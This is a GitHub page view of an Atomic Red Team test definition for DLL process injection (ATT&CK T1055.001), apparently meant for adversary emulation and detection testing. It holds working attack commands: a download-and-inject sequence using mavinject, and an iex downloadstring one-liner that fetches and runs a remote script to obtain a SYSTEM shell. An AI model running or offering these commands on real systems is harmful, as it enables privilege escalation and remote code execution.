d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
47 lines
2.0 KiB
YAML
47 lines
2.0 KiB
YAML
attack_technique: T1055.001
|
|
display_name: 'Process Injection: Dynamic-link Library Injection'
|
|
atomic_tests:
|
|
- name: Process Injection via mavinject.exe
|
|
auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
|
|
description: |
|
|
Windows 10 Utility To Inject DLLS.
|
|
|
|
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
|
|
With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
process_id:
|
|
description: PID of input_arguments
|
|
type: string
|
|
default: (Start-Process notepad -PassThru).id
|
|
dll_payload:
|
|
description: DLL to Inject
|
|
type: path
|
|
default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Utility to inject must exist on disk at specified location (#{dll_payload})
|
|
prereq_command: |
|
|
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
|
|
executor:
|
|
command: |
|
|
$mypid = #{process_id}
|
|
mavinject $mypid /INJECTRUNNING "#{dll_payload}"
|
|
Stop-Process -processname notepad
|
|
name: powershell
|
|
elevation_required: true
|
|
- name: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
|
|
auto_generated_guid: 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5
|
|
description: Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique via function of WinPwn
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
|
|
name: powershell
|